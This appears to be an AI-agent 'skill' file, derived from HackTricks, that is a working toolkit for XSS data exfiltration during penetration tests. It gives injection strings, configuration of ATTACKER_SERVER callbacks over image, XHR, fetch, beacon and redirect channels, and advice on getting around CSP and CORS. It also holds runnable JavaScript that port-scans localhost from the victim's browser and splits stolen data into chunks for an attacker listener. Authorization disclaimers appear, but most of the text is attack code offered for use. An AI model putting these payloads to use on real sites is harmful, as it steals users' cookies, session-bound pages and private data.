Hacktricks-skills xss-data-exfiltration

Generate JavaScript payloads for XSS data exfiltration during authorized penetration testing. Use this skill whenever you need to extract sensitive data (cookies, page content, internal ports) from a compromised browser context through various channels (images, XHR, fetch, beacon, location). This is for security testing only - ensure you have explicit authorization before using these techniques.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/xss-cross-site-scripting/steal-info-js/SKILL.MD
source content

XSS Data Exfiltration

This skill helps you create JavaScript payloads to exfiltrate data from compromised browser contexts during authorized penetration testing. It supports multiple exfiltration channels to bypass different security controls.

When to Use This Skill

Use this skill when:

  • You've identified an XSS vulnerability and need to extract sensitive data
  • You need to test what data can be exfiltrated from a compromised page
  • You're conducting authorized security assessments
  • You need to bypass specific security controls (CSP, firewalls, etc.)

⚠️ Authorization Required: Only use these techniques on systems you own or have explicit written permission to test.

Exfiltration Methods

The skill supports 7 different exfiltration channels:

| Method | Description | Best For |
| --- | --- | --- |
| EXFIL_BY_IMG | Image tag requests | Bypasses some WAFs, simple |
| EXFIL_BY_RQ_GET | XMLHttpRequest GET | Reliable, standard |
| EXFIL_BY_RQ_POST | XMLHttpRequest POST | Larger payloads, POST data |
| EXFIL_BY_FETCH_GET | Fetch API GET | Modern browsers, no-cors |
| EXFIL_BY_FETCH_POST | Fetch API POST | Modern browsers, POST data |
| EXFIL_BY_NAV | navigator.sendBeacon | Reliable on page unload |
| EXFIL_BY_LOC | Location redirect | Final exfil, encoded data |

Which channel survives a Content Security Policy depends on the directive that governs it: image loads fall under img-src, while XMLHttpRequest, fetch and sendBeacon all fall under connect-src. A location redirect is a top-level navigation and is restricted by neither, at the cost of taking the victim off the page.

Quick Start

1. Set Your Attacker Server

Replace the ATTACKER_SERVER variable with your listener:

var ATTACKER_SERVER = "https://your-c2-server.com"

Common options:

  • Burp Collaborator: https://xxxx.burpcollaborator.net
  • Your own server with a listener
  • nc -lvnp 8080 for simple testing

nc only speaks plaintext HTTP. If the target page is served over HTTPS, the browser blocks http:// XMLHttpRequest, fetch and sendBeacon requests as mixed content, so the listener must be reachable over HTTPS with a certificate the victim's browser trusts (Burp Collaborator provides this out of the box).

2. Select Exfiltration Methods

Enable the methods you want to use:

var EXFIL_BY_IMG = false
var EXFIL_BY_RQ_GET = false
var EXFIL_BY_RQ_POST = true  // Recommended default
var EXFIL_BY_FETCH_GET = false
var EXFIL_BY_FETCH_POST = false
var EXFIL_BY_NAV = false
var EXFIL_BY_LOC = false

Recommendations:

  • Start with EXFIL_BY_RQ_POST for reliability
  • Add EXFIL_BY_NAV for page unload scenarios
  • Use EXFIL_BY_LOC as a final exfil method only: the redirect takes the victim off the page and ends any further collection
  • Enable multiple methods for redundancy

3. Generate the Payload

Use the bundled script to generate a customized payload:

./scripts/generate-xss-payload.sh --server "https://your-server.com" --methods "post,beacon" --output payload.js

Or manually copy from scripts/xss-exfil.js and modify the configuration.

Data Collected by Default

The payload automatically exfiltrates:

  1. Cookies - document.cookie (only cookies without the HttpOnly flag are visible to script)
  2. Current URL - document.URL
  3. Page Content - document.documentElement.innerHTML
  4. Additional Pages - /, /admin, /flag, /flag.txt, fetched same-origin so they carry the victim's session
  5. Internal Ports - Scans top 1000 common ports on localhost by attempting connections from the victim's browser; a result is inferred from how each attempt fails, so treat it as heuristic, and ports the browser itself refuses to connect to cannot be told apart from closed ones
  6. Window Messages - Listens for onmessage events and forwards the postMessage data the page receives

Customization

Add Custom Data Collection

Add your own exfiltration calls:

exfil_info("custom_data", encode(someVariable))

Modify Port Scan

Edit the top_1000 array or add custom ports:

exfil_internal_port(8080)
exfil_internal_port(3000)
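How a browser-side port probe can classify a localhost port, as an added example; the skill's own exfil_internal_port() internals are not shown on this page, so this is not its code. A fetch() with mode "no-cors" settles differently depending on the port: a port that speaks HTTP resolves with an opaque response, a closed port rejects almost at once (TCP reset), and anything else hangs until the abort timeout. The state labels, the timeout, the short illustrative list of browser-blocked ports and the injectable probe function are all assumptions of this example.

```javascript
// Added example (not the skill's bundled scripts/xss-exfil.js): timing-based
// probing of 127.0.0.1 ports from the victim's browser. The probe is injectable
// (an assumption of this example) so the classifier can run without a network.
var PROBE_TIMEOUT_MS = 1500;
// A few well-known entries from the browsers' built-in "unsafe port" lists; the
// full list differs per browser and version. Such ports are refused before any
// connection is made, which looks exactly like "closed" from JavaScript.
var BROWSER_BLOCKED_PORTS = [21, 22, 23, 25, 110, 143, 6000];

function browserProbe(port) {
  var ctrl = new AbortController();
  var timer = setTimeout(function () { ctrl.abort(); }, PROBE_TIMEOUT_MS);
  var started = Date.now();
  return fetch("http://127.0.0.1:" + port + "/", { mode: "no-cors", signal: ctrl.signal })
    .then(function () { return { outcome: "resolved", ms: Date.now() - started }; },
          function (err) {
            var aborted = err && err.name === "AbortError";
            return { outcome: aborted ? "timeout" : "rejected", ms: Date.now() - started };
          })
    .finally(function () { clearTimeout(timer); });
}

// Maps one probe outcome to a state. Labels are deliberately hedged: a fast
// rejection can also be an open non-HTTP service that closed the connection.
function classify(port, result) {
  if (result.outcome === "resolved") return "open";
  if (result.outcome === "timeout") return "open-or-filtered";
  if (BROWSER_BLOCKED_PORTS.indexOf(port) !== -1) return "blocked-by-browser";
  return "closed-or-non-http";
}

// Probes ports in small batches: browsers cap concurrent connections per host,
// and a flood of pending fetches pushes every result toward "timeout".
function scanPorts(ports, probe, batchSize) {
  probe = probe || browserProbe;
  batchSize = batchSize || 6;
  var results = {};
  var i = 0;
  function next() {
    if (i >= ports.length) return Promise.resolve(results);
    var slice = ports.slice(i, i + batchSize);
    i += batchSize;
    return Promise.all(slice.map(function (p) { return probe(p); })).then(function (outcomes) {
      slice.forEach(function (p, j) { results[p] = classify(p, outcomes[j]); });
      return next();
    });
  }
  return next();
}

// Only the interesting ports need to reach the listener.
function interestingPorts(results) {
  return Object.keys(results).filter(function (p) {
    return results[p] === "open" || results[p] === "open-or-filtered";
  }).map(Number).sort(function (a, b) { return a - b; });
}
```

In a payload, `scanPorts([8080, 3000])` (or the whole top_1000 array) followed by `interestingPorts()` gives the list to hand to exfil_info() with the rest of the data. Keep the batch size small: the per-host connection limit in browsers is around six, so a larger batch only makes later probes wait on earlier ones and skews the timing.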

Change Exfil Timing

For location-based exfil, adjust the timeout. Wrap the call in a function; otherwise exfil_info runs immediately and setTimeout receives its return value instead of a callback:

setTimeout(function () { exfil_info("finish", "finish", true) }, 5000) // 5 seconds

Testing Your Payload

1. Set Up a Listener

# Simple HTTP listener
nc -lvnp 8080

# Or use Burp Collaborator
# Or your own server with logging

2. Inject the Payload

Insert the JavaScript into the vulnerable parameter:

<script>[YOUR_PAYLOAD]</script>

Or use an event-handler variant if <script> tags are filtered:

<img src=x onerror="[YOUR_PAYLOAD]">

Inside an attribute the payload must not contain the attribute's own quote character: either switch the payload's string literals to single quotes or HTML-encode the double quotes as &quot;, which the browser decodes before running the handler.

3. Verify Exfiltration

Check your listener for incoming requests. You should see:

  • Cookie data
  • Page content
  • Port scan results
  • Any custom data you added

Troubleshooting

No Data Received

  1. Check CORS: the listener never has to answer with CORS headers; exfil only needs the request to leave the browser. Use mode: "no-cors" for fetch so the opaque response does not reject the promise, and keep POST bodies to a simple content type (application/x-www-form-urlencoded, multipart/form-data or text/plain). A non-simple request triggers an OPTIONS preflight, and the data never goes out unless the server answers it
  2. Try Multiple Methods: a CSP connect-src or img-src directive may block some channels but not others
  3. Check Server: Ensure your listener is running, reachable from the victim's browser and, if the target page is HTTPS, serving a valid certificate (plaintext requests from an HTTPS page are blocked as mixed content)
  4. Verify XSS: Confirm the payload is actually executing, for example with a request for a unique marker URL before wiring up the full collection

CSP Blocking

If Content Security Policy blocks your payload:

  • Check which directive is blocking; the browser console's CSP violation message names it. EXFIL_BY_IMG is governed by img-src, while EXFIL_BY_RQ_GET, EXFIL_BY_RQ_POST, EXFIL_BY_FETCH_GET, EXFIL_BY_FETCH_POST and EXFIL_BY_NAV (sendBeacon) are all governed by connect-src, so sendBeacon does not get past a policy that already blocks XHR or fetch
  • Try EXFIL_BY_IMG when img-src is looser than connect-src (policies that allow images from any host are common)
  • Use EXFIL_BY_LOC: a top-level navigation is restricted by neither connect-src nor img-src, though it takes the victim off the page and is limited by URL length
  • If script-src blocks the injected script itself, consider DOM-based XSS vectors that execute through scripts the policy already allows

Large Payloads

For large data:

  • Use EXFIL_BY_RQ_POST or EXFIL_BY_FETCH_POST; a POST body is not subject to URL length limits
  • Chunk the data into multiple requests, tagging each chunk with a sequence number so the listener can reassemble it (image-based chunks arrive out of order)
  • Use EXFIL_BY_LOC only for a small, final item: everything travels in the URL, so it is bounded by the URL length the listener accepts, and the navigation ends collection on the page
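The chunking described above, together with the reassembly a listener would do, as an added example that is not part of the skill's bundled scripts. It takes data already passed through the page's encode() (base64url) and splits it into numbered GET URLs; the query-string field names (id, seq, of), the transfer id and the MAX_URL cap are assumptions of this example, with MAX_URL kept under the roughly 2 KB that some servers and proxies enforce on a request line.

```javascript
// Added example, not part of the skill's bundled scripts: split one already
// encoded blob into numbered chunks that each fit in a GET URL, plus the matching
// reassembly and decode on the listener side. Field names and MAX_URL are assumed.
var ATTACKER_SERVER = "https://your-c2-server.com"; // placeholder, as on this page
var MAX_URL = 1800;

// Returns one URL per chunk. The data is base64url (from encode()), so it never
// needs percent-encoding and a chunk boundary can fall anywhere.
function chunkUrls(transferId, name, encoded, maxUrl) {
  maxUrl = maxUrl || MAX_URL;
  var head = ATTACKER_SERVER + "/?name=" + encodeURIComponent(name) + "&id=" + transferId + "&seq=";
  var room = maxUrl - head.length - "0000&of=0000&data=".length; // four-digit counters
  if (room < 1) throw new Error("maxUrl leaves no room for data");
  var parts = [];
  for (var i = 0; i < encoded.length; i += room) parts.push(encoded.slice(i, i + room));
  if (parts.length === 0) parts.push("");
  return parts.map(function (p, i) { return head + i + "&of=" + parts.length + "&data=" + p; });
}

// Listener side: group by transfer id, order by seq, and report gaps instead of
// silently joining whatever arrived.
function reassemble(urls) {
  var transfers = {};
  urls.forEach(function (u) {
    var q = new URL(u).searchParams;
    var id = q.get("id");
    var t = transfers[id] || (transfers[id] = { name: q.get("name"), of: Number(q.get("of")), parts: {} });
    t.parts[Number(q.get("seq"))] = q.get("data");
  });
  var out = {};
  Object.keys(transfers).forEach(function (id) {
    var t = transfers[id], pieces = [], missing = [];
    for (var i = 0; i < t.of; i++) {
      if (t.parts[i] === undefined) missing.push(i); else pieces.push(t.parts[i]);
    }
    out[id] = { name: t.name, missing: missing, encoded: missing.length ? null : pieces.join("") };
  });
  return out;
}

// Inverse of encode(): base64url back to the original text.
function decode(b64url) {
  var b64 = b64url.replace(/-/g, "+").replace(/_/g, "/");
  while (b64.length % 4) b64 += "=";
  var bin = atob(b64), bytes = new Uint8Array(bin.length);
  for (var i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
  return new TextDecoder().decode(bytes);
}
```

Each URL from chunkUrls() can be handed to EXFIL_BY_IMG or EXFIL_BY_FETCH_GET; EXFIL_BY_LOC can carry exactly one of them, since the navigation happens once. reassemble() returns encoded as null and lists the missing sequence numbers when a chunk was dropped, which is the signal to re-send rather than to trust a truncated page dump.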

Security Notes

  • Authorization: Only use on authorized targets
  • Data Handling: Be careful with sensitive data you exfiltrate
  • Cleanup: Remove test payloads after assessment
  • Documentation: Document findings for your report

References

Bundled Resources

  • scripts/xss-exfil.js - Base exfiltration payload
  • scripts/generate-xss-payload.sh - Payload generator script